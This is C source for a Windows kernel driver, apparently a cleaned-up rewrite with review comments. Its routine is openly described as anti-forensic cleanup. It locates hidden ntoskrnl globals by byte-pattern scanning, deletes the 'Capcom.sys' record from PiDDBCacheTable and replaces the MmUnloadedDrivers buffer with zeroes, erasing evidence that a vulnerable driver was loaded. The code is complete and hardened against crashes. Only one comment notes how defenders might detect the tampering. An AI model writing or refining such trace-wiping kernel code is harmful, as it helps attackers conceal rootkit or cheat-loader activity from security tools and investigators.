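// Size of the buffer the original author reports the kernel uses for the
// MmUnloadedDrivers array (Win7 and later per their note; not verifiable here).
#define MM_UNLOADED_DRIVERS_BYTES   0x7D0
// Pool tag used when the kernel's MmUnloadedDrivers buffer is freed ('MmDT').
// The original frees the kernel-owned buffer with this tag; confirm it matches
// the tag the kernel allocated it with on the targeted build.
#define MM_UNLOADED_DRIVERS_TAG     0x54446D4D
// Pool tag for the transient module-list buffer ('ENON').
#define MODULE_LIST_TAG             0x454E4F45
// SYSTEM_INFORMATION_CLASS value for SystemModuleInformation.
#define SYSTEM_MODULE_INFORMATION   11

/*
 * Locate ntoskrnl.exe in the loaded-module list.
 *
 * Returns TRUE and fills *imageBase / *imageSize when the entry whose path is
 * exactly "\SystemRoot\system32\ntoskrnl.exe" is found, FALSE otherwise.
 * The comparison is case-sensitive and tied to that exact path string, as in
 * the original; a differently spelled path would not match.
 *
 * Fixes versus the original inline code: the pool allocation is NULL-checked,
 * the buffer is freed on every path (the original leaked it when the second
 * query failed), and it is freed with the tag it was allocated with (the
 * original freed with tag 0, which trips ExFreePoolWithTag's tag check under
 * Driver Verifier / checked builds).
 */
static BOOLEAN FindNtoskrnlImage(UINT64 *imageBase, UINT64 *imageSize)
{
    ULONG bytes = 0;

    // Size probe: expected to fail (STATUS_INFO_LENGTH_MISMATCH) while still
    // reporting the required size, so the status is only logged, not tested.
    NTSTATUS status = ZwQuerySystemInformation(SYSTEM_MODULE_INFORMATION, 0, bytes, &bytes);
    if (!bytes) {
        DbgPrint("CleanUnloadedDrivers: first NtQuerySystemInformation failed, status: 0x%x", status);
        return FALSE;
    }

    // Plain data buffer: no reason for it to live in executable pool.
    PRTL_PROCESS_MODULES modules =
        (PRTL_PROCESS_MODULES)ExAllocatePoolWithTag(NonPagedPoolNx, bytes, MODULE_LIST_TAG);
    if (!modules) {
        DbgPrint("CleanUnloadedDrivers: module list allocation of %lu bytes failed", bytes);
        return FALSE;
    }

    BOOLEAN found = FALSE;

    // NOTE(review): if a module loads between the probe and this call the
    // required size grows and this call fails; a retry loop would be more
    // robust. Kept single-shot to match the original.
    status = ZwQuerySystemInformation(SYSTEM_MODULE_INFORMATION, modules, bytes, &bytes);
    if (!NT_SUCCESS(status)) {
        DbgPrint("CleanUnloadedDrivers: second NtQuerySystemInformation failed, status: 0x%x", status);
    } else {
        PRTL_PROCESS_MODULE_INFORMATION module = modules->Modules;
        for (ULONG i = 0; i < modules->NumberOfModules; i++) {
            DbgPrint("CleanUnloadedDrivers: path: %s", module[i].FullPathName);
            if (!strcmp((char *)module[i].FullPathName, "\\SystemRoot\\system32\\ntoskrnl.exe")) {
                *imageBase = (UINT64)module[i].ImageBase;
                *imageSize = (UINT64)module[i].ImageSize;
                found = TRUE;
                break;
            }
        }
    }

    // Free with the allocating tag on every path.
    ExFreePoolWithTag(modules, MODULE_LIST_TAG);

    if (!found || *imageBase == 0) {
        DbgPrint("CleanUnloadedDrivers: ntoskrnlBase equals zero");
        return FALSE;
    }
    return TRUE;
}

/*
 * Remove the PiDDBCacheTable entry for driverName.
 *
 * The lookup/unlink/delete sequence runs under the exclusive PiDDB resource
 * lock. Returns TRUE when an entry was found and removed, FALSE when no entry
 * matched (nothing is modified in that case).
 *
 * NOTE(review): only DriverName is populated in the lookup key. If the
 * table's compare routine also keys on other fields of the entry, the lookup
 * will miss — confirm against the targeted build.
 */
static BOOLEAN RemovePiDDBCacheEntry(PERESOURCE lock, PRTL_AVL_TABLE table,
                                     const UNICODE_STRING *driverName)
{
    PiDDBCacheEntry lookup = { 0 };
    lookup.DriverName = *driverName;

    // ExAcquireResourceExclusiveLite requires normal kernel APCs to be
    // disabled by the caller; the original acquired the resource without
    // entering a critical region.
    KeEnterCriticalRegion();
    ExAcquireResourceExclusiveLite(lock, TRUE);

    PiDDBCacheEntry *entry = (PiDDBCacheEntry *)RtlLookupElementGenericTableAvl(table, &lookup);
    if (entry == NULL) {
        ExReleaseResourceLite(lock);
        KeLeaveCriticalRegion();
        DbgPrint("NO Found Entry");
        return FALSE;
    }
    DbgPrint("Found Entry");

    // RemoveEntryList reports whether the list became empty, not whether the
    // unlink happened, so this message only fires for the last entry.
    if (RemoveEntryList(&entry->List))
        DbgPrint("Removed Entry");

    // Then delete the element from the AVL table itself.
    if (RtlDeleteElementGenericTableAvl(table, entry))
        DbgPrint("Removed Table");

    ExReleaseResourceLite(lock);
    KeLeaveCriticalRegion();
    return TRUE;
}

/*
 * Swap the buffer behind the MmUnloadedDrivers pointer for a zeroed one.
 *
 * bufferSlot points at the kernel global holding the buffer address. A fresh
 * MM_UNLOADED_DRIVERS_BYTES allocation is zeroed, stored into the slot, and
 * the previous buffer (if any) is freed. Returns FALSE if the allocation fails,
 * leaving the kernel state untouched.
 *
 * NOTE(review): the swap is done without whatever lock the kernel uses to
 * serialise this array (nothing here takes one), so a concurrent driver unload
 * is a race. Also, only the buffer is replaced; any index the kernel keeps into
 * it is not reset here, so the effect is zeroed records, not an emptied array.
 */
static BOOLEAN ReplaceMmUnloadedDriversBuffer(UINT64 *bufferSlot)
{
    PVOID fresh = ExAllocatePoolWithTag(NonPagedPoolNx, MM_UNLOADED_DRIVERS_BYTES, MM_UNLOADED_DRIVERS_TAG);
    if (!fresh) {
        DbgPrint("CleanUnloadedDrivers: MmUnloadedDrivers replacement allocation failed");
        return FALSE;
    }
    memset(fresh, 0, MM_UNLOADED_DRIVERS_BYTES);

    UINT64 previous = *bufferSlot;
    *bufferSlot = (UINT64)fresh;

    // The original freed unconditionally; freeing a NULL pool pointer is a
    // bugcheck, so guard it.
    if (previous)
        ExFreePoolWithTag((PVOID)previous, MM_UNLOADED_DRIVERS_TAG);
    return TRUE;
}

/*
 * CleanUnloadedDrivers
 *
 * Anti-forensic cleanup: removes the traces the kernel keeps of a previously
 * loaded driver (hard-coded here to "Capcom.sys") from two non-exported
 * globals that are located by signature-scanning the ntoskrnl image:
 *
 *   1. PiDDBCacheTable — the AVL table of driver records keyed by name; the
 *      matching entry is unlinked and deleted under PiDDBLock.
 *   2. MmUnloadedDrivers — the unloaded-driver record array; the whole buffer
 *      is replaced by a zeroed allocation and the old one freed.
 *
 * Returns TRUE when the cleanup ran (or, as in the original, when no PiDDB
 * entry was found — in that case the MmUnloadedDrivers step is skipped), and
 * FALSE on any query, allocation or signature-scan failure.
 *
 * The signature patterns and the displacement offsets passed to
 * ResolveRelativeAddress are specific to particular ntoskrnl builds. The
 * original only NULL-checked the MmUnloadedDrivers scan and passed the other
 * two results straight into ResolveRelativeAddress; on a build where either
 * pattern is absent that is a NULL dereference in kernel mode. All three
 * scans are now checked and the routine fails closed.
 *
 * Defender's note: clearing these structures is itself an observable
 * artifact — a zeroed MmUnloadedDrivers buffer that the kernel allocated
 * elsewhere, or a PiDDB table that no longer lists a driver whose load is
 * otherwise evidenced, are reasonable detection signals.
 */
BOOLEAN CleanUnloadedDrivers()
{
    UINT64 ntoskrnlBase = 0, ntoskrnlSize = 0;
    if (!FindNtoskrnlImage(&ntoskrnlBase, &ntoskrnlSize))
        return FALSE;

    // lea rcx, [rip+disp32]; call ...; mov r9, ... — displacement at +3, 7-byte instruction.
    PVOID piDDBLockPtr = (PVOID)FindPattern(ntoskrnlBase, ntoskrnlSize,
        (UCHAR *)"\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\x4C\x8B\x8C", "xxx????x????xxx");
    // add dx, dx; lea rcx, [rip+disp32] — displacement at +6, 10-byte match.
    PVOID piDDBCacheTablePtr = (PVOID)FindPattern(ntoskrnlBase, ntoskrnlSize,
        (UCHAR *)"\x66\x03\xD2\x48\x8D\x0D", "xxxxxx");
    // NOTE: [4C 8B ? ? ? ? ? 4C 8B C9 4D 85 ? 74] + 3 displacement, resolved
    // relative to the end of the 7-byte instruction, yields MmUnloadedDrivers.
    UINT64 mmUnloadedDriversPtr = FindPattern(ntoskrnlBase, ntoskrnlSize,
        (BYTE *)"\x4C\x8B\x00\x00\x00\x00\x00\x4C\x8B\xC9\x4D\x85\x00\x74", "xx?????xxxxx?x");

    // Fail closed on any missed signature; a NULL result must never reach
    // ResolveRelativeAddress or the displacement read below.
    if (!piDDBLockPtr || !piDDBCacheTablePtr) {
        DbgPrint("CleanUnloadedDrivers: PiDDB signature scan failed");
        return FALSE;
    }
    if (!mmUnloadedDriversPtr) {
        DbgPrint("CleanUnloadedDrivers: mmUnloadedDriversPtr equals zero");
        return FALSE;
    }

    PERESOURCE piDDBLock = (PERESOURCE)ResolveRelativeAddress(piDDBLockPtr, 3, 7);
    PRTL_AVL_TABLE piDDBCacheTable = (PRTL_AVL_TABLE)ResolveRelativeAddress(piDDBCacheTablePtr, 6, 10);

    // Present in the original; its purpose is not evident from here
    // (TableContext is the table's caller-owned context pointer) and it is
    // written before the lock is taken. NOTE(review): confirm this is intended.
    piDDBCacheTable->TableContext = (PVOID)1;

    UNICODE_STRING driverName;
    RtlInitUnicodeString(&driverName, L"Capcom.sys");

    // As in the original: no PiDDB entry means "nothing to do" and the
    // MmUnloadedDrivers step is skipped. NOTE(review): confirm that is wanted,
    // since the unload record would then survive.
    if (!RemovePiDDBCacheEntry(piDDBLock, piDDBCacheTable, &driverName))
        return TRUE;

    // Resolve the RIP-relative displacement by hand exactly as the original
    // did (disp32 at +3, instruction length 7); presumably equivalent to
    // ResolveRelativeAddress(ptr, 3, 7), kept verbatim to avoid assuming so.
    UINT64 *mmUnloadedDrivers = (UINT64 *)((PUCHAR)mmUnloadedDriversPtr
                                           + *(PULONG)((PUCHAR)mmUnloadedDriversPtr + 3) + 7);
    if (!ReplaceMmUnloadedDriversBuffer(mmUnloadedDrivers))
        return FALSE;

    DbgPrint("All Cleaning Done");
    return TRUE;
}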